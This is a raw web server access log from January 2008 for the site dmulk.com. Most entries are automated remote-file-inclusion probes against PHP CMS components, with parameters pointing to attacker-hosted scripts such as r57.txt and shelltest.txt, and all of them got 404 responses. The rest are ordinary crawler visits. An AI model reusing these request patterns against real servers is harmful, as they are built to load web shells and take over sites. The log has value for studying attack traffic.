124.32.128.178 - - [22/Jan/2008:14:05:47 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [22/Jan/2008:14:05:47 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.32.128.178 - - [22/Jan/2008:14:06:02 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:14:08:12 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:14:08:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:14:08:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.118 - - [22/Jan/2008:14:10:43 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:12:20 -0800] "GET /modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.20.52 - - [22/Jan/2008:14:13:08 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [22/Jan/2008:14:13:09 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [22/Jan/2008:14:13:41 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.saenterpriseworkshop.com/vnc/MIC22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:16:24 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:16:24 -0800] "GET /modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:16:24 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:16:24 -0800] "GET /logs/access_071220.log/modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.221.240.132 - - [22/Jan/2008:14:19:24 -0800] "GET /index.php?redir=http://www.freewebtown.com/static23/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
89.221.240.132 - - [22/Jan/2008:14:19:24 -0800] "GET /logs/index.php?redir=http://www.freewebtown.com/static23/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
89.221.240.132 - - [22/Jan/2008:14:19:25 -0800] "GET /logs/index.php?redir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.221.240.132 - - [22/Jan/2008:14:19:25 -0800] "GET /index.php?redir=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:20:13 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.105.34 - - [22/Jan/2008:14:20:33 -0800] "GET /logs///index.php?autoLoadConfig[999][0][autoType]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:20:34 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.119.18 - - [22/Jan/2008:14:21:09 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
70.86.119.18 - - [22/Jan/2008:14:21:09 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
62.50.14.189 - - [22/Jan/2008:14:21:55 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [22/Jan/2008:14:21:56 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [22/Jan/2008:14:21:56 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:14:21:59 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:14:22:00 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:14:22:03 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:14:22:03 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.220.191.9 - - [22/Jan/2008:14:25:31 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:26:27 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:26:27 -0800] "GET /modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.196.29 - - [22/Jan/2008:14:26:27 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.15.40 - - [22/Jan/2008:14:26:47 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.50.15.40 - - [22/Jan/2008:14:26:47 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
194.58.105.34 - - [22/Jan/2008:14:29:16 -0800] "GET ///index.php?autoLoadConfig[999][0][autoType]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.220.191.9 - - [22/Jan/2008:14:30:45 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.220.191.9 - - [22/Jan/2008:14:30:46 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.50.14.189 - - [22/Jan/2008:14:30:52 -0800] "GET /logs/access_071220.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.urworte.de/wp-content/plugins/mygallery/myfunctions/ALB.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.220.191.9 - - [22/Jan/2008:14:31:13 -0800] "GET /logs/access_071221.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:31:39 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:31:39 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:31:43 -0800] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:31:43 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.20.191.116 - - [22/Jan/2008:14:35:51 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)" "www.dmulk.com"
75.20.191.116 - - [22/Jan/2008:14:35:52 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322)" "www.dmulk.com"
75.20.191.116 - - [22/Jan/2008:14:35:54 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)" "www.dmulk.com"
75.20.191.116 - - [22/Jan/2008:14:35:56 -0800] "GET /backup2/ HTTP/1.1" 401 395 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)" "www.dmulk.com"
195.225.105.144 - - [22/Jan/2008:14:36:34 -0800] "GET /logs/http://netbr.org/documents/r57.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
195.225.105.144 - - [22/Jan/2008:14:36:34 -0800] "GET /http://netbr.org/documents/r57.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
202.155.109.117 - - [22/Jan/2008:14:39:18 -0800] "GET /logs/access_071221.log///index.php?autoLoadConfig[999][0][autoType]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:14:40:16 -0800] "GET /logs/access.log/index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:14:40:16 -0800] "GET /index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:14:40:16 -0800] "GET /logs/index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:45:21 -0800] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [22/Jan/2008:14:45:24 -0800] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:45:55 -0800] "GET /minamijewelry/html/images/jewelry/W3t.jpg HTTP/1.0" 200 2691 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:45:56 -0800] "GET /minamijewelry/html/images/jewelry/W1t.jpg HTTP/1.0" 200 2250 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:14:47:10 -0800] "GET /logs/access_071225.log/index.php?body=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.43 - - [22/Jan/2008:14:47:19 -0800] "GET /logs/access_071004.log HTTP/1.0" 200 70439 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:14:52:21 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:14:52:21 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.33.211 - - [22/Jan/2008:14:52:21 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:53:10 -0800] "GET /minamijewelry/html/images/jewelry/K5.jpg HTTP/1.0" 200 59863 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:14:53:27 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.155.109.117 - - [22/Jan/2008:14:53:40 -0800] "GET /logs/access_071221.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [22/Jan/2008:14:53:41 -0800] "GET //SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [22/Jan/2008:14:53:41 -0800] "GET /logs//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:14:54:05 -0800] "GET /logs/access.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:14:54:06 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.99.247 - - [22/Jan/2008:14:54:06 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.228.30 - - [22/Jan/2008:14:54:56 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [22/Jan/2008:14:54:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [22/Jan/2008:14:54:58 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [22/Jan/2008:14:54:59 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:14:55:02 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:14:55:02 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:14:55:10 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.203.157 - - [22/Jan/2008:14:57:03 -0800] "GET /logs/access.log//spaw/config/spaw_control.config.php?spaw_root=http://www.r57.li/r57.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [22/Jan/2008:14:57:03 -0800] "GET //spaw/config/spaw_control.config.php?spaw_root=http://www.r57.li/r57.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.237.203.157 - - [22/Jan/2008:14:57:04 -0800] "GET /logs//spaw/config/spaw_control.config.php?spaw_root=http://www.r57.li/r57.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:10 -0800] "GET /minamijewelry/html/images/jewelry/K3t.jpg HTTP/1.0" 200 3286 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:10 -0800] "GET /minamijewelry/html/images/jewelry/K1t.jpg HTTP/1.0" 200 3152 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:11 -0800] "GET /minamijewelry/html/images/jewelry/K3.jpg HTTP/1.0" 200 63530 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:12 -0800] "GET /minamijewelry/html/images/jewelry/K5t.jpg HTTP/1.0" 200 3650 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:12 -0800] "GET /minamijewelry/html/images/jewelry/W5.jpg HTTP/1.0" 200 53581 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:13 -0800] "GET /minamijewelry/html/images/jewelry/W6.jpg HTTP/1.0" 200 59452 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:13 -0800] "GET /minamijewelry/html/images/jewelry/W1.jpg HTTP/1.0" 200 55247 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:14:57:15 -0800] "GET /minamijewelry/html/images/jewelry/W3.jpg HTTP/1.0" 200 48931 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.30.179.209 - - [22/Jan/2008:14:57:16 -0800] "GET /bikes/dteel/?S=A HTTP/1.0" 200 8528 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:14:57:34 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.6.122.186 - - [22/Jan/2008:15:00:20 -0800] "GET /logs/access.log/config.php?path_to_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [22/Jan/2008:15:00:21 -0800] "GET /config.php?path_to_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [22/Jan/2008:15:00:21 -0800] "GET /logs/config.php?path_to_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.90.179.94 - - [22/Jan/2008:15:01:23 -0800] "GET /logs/access_071225.log//lang.php?subpage=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.90.179.94 - - [22/Jan/2008:15:01:23 -0800] "GET //lang.php?subpage=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.90.179.94 - - [22/Jan/2008:15:01:23 -0800] "GET /logs//lang.php?subpage=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:01:51 -0800] "GET /logs/access_071229.log/cyberfolio/portfolio/msg/view.php?av=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:01:51 -0800] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:01:52 -0800] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.155.109.117 - - [22/Jan/2008:15:03:33 -0800] "GET /logs/access_071224.log//SHELLZ.php//convert/mvcw.php?step=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:15:04:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:15:04:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:15:04:17 -0800] "GET /logs/access.log/cyberfolio/portfolio/msg/view.php?av=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.72 - - [22/Jan/2008:15:04:24 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:15:05:05 -0800] "GET /minamijewelry/html/images/jewelry/K2t.jpg HTTP/1.0" 200 3715 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.6.122.186 - - [22/Jan/2008:15:06:23 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:15:06:52 -0800] "GET /logs/index.php?option=com_swmenuprohttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.28.71 - - [22/Jan/2008:15:07:02 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.90.179.94 - - [22/Jan/2008:15:08:42 -0800] "GET /logs/access_071216.log//lang.php?subpage=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
